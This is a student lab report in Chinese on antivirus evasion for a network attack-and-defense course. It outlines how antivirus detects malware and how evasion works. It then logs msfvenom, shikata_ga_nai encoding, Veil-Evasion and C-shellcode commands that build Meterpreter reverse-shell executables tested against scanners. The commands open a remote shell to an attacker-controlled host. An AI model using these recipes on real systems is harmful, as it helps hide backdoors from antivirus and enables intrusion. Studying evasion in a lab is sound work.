20145316许心远《网络攻防》第三次实验：免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的？

• 基于特征码的检测
• 启发式恶意软件检测

• 基于行为的恶意软件检测

  免杀是作什么？

• 免杀即“反-反病毒”/“反杀毒技术”，在这个实验中可让安插的后门不被AV软件发现。

  免杀的基本方法有哪些？

• 改变特征码
  • 若是你手里只有EXE
    • 加壳：压缩壳 加密壳
  • 有shellcode(像Meterpreter）
    • 用encode进行编码
    • 基于payload从新编译生成可执行文件
  • 有源代码
    • 用其余语言进行重写再编译（veil-evasion）
• 改变行为
  • 通信方式
    • 尽可能使用反弹式链接
    • 使用隧道技术
    • 加密通信数据
  • 操做模式
    • 基于内存操做
    • 减小对系统的修改
    • 加入混淆做用的正常功能代码

实践总结与体会

• 本次实践是十分有趣，一直以来我都十分信任本身的杀软，我会隔一段时间就用杀软对个人电脑进行一次全面检测查杀，本觉得这样的好习惯能够保证绝对的安全，事实证实，naive。

• 经过virscan平台的几回实验，对各种杀毒软件的靠谱性有了大体的了解（虽然可能一些杀软由于运气很差被我冤枉了），总的来说，好像外国的杀软更好用一点啊？咱们平日里解除的某卫士、某星、某毒霸令我失望。

  离实战还缺些什么技术或步骤

• 靶机要乖乖关闭防火墙开放端口等我把后门种进去，这一般是不现实的，防火墙关闭电脑会一直提醒你打开。
• 杀软的病毒库都是在一直更新的，咱们现阶段所知道的方式能作出来的免杀，大公司早就想到了，一有出现当即更新。

• IP地址会有更新。

  实践过程记录

  msfvenom直接生成meterpreter可执行文件

• 个人主机（win10）ip
  
• 虚拟机kali的ip
  
• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=任意 -f exe > met.exe生成meterpreter可执行文件
  
• 靶机打开端口监听
  
• 使用ncat传输到主机（上次实践的方式）
  
• 前提：关闭杀软（不然回即时清除）
  
• 传输成功
  
• 到www.virscan.org上检测多少杀软能够把它查杀出来
  

• 毕竟是简单恶意软件，能够看出来，仍是不少杀软发现有病毒的。

  Msfvenom使用编码器生成meterpreter可执行文件

  编码一次

• 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met1.exe生成编码一次的可执行文件
  
• 发到主机，再次检测
  

• 好像能查杀出来的AV稍微少了点哦，不过进步不明显，仍是要努力啊。

  编码十次

• 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met2.exe
  
• 发到主机，检测（糟糕啊，写博客发现忘记截图了！）

• 算了，你们知道就好，咱们的恶意软件依然没有多大进步，看来AV对这种软件的抵抗度很高，毕竟西方哪个国家我没有去过~

  使用Veil-Evasion生成可执行文件

• 在kali终端直接输入veil-evasion进入ve界面，输入use python/meterpreter/rev_tcp
  
• 使用set LHOST和set LPORT命令，都设为kali的，成功界面以下：
  
• 最终生成的可执行文件在这个目录下/var/lib/veil-evasion/output/compiled/，你们进去本身找一下
  
• 传送到主机，检测结果
  

• 已经有很大的进步啦，这种方式效果不错

  使用C语言调用Shellcode

• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP LPORT=任意 -f c生成一个C语言数组
  
• 利用这个数组在主机的vs平台下写shellcode（感谢高其同窗提供源代码供我复制粘贴~）
  
• 编译成为可执行文件
  
• kali端进行msf监听（上节课内容）
  
• 获取主机权限
  
• 检测结果
  

• 很厉害啊，只有几个杀软能杀出来了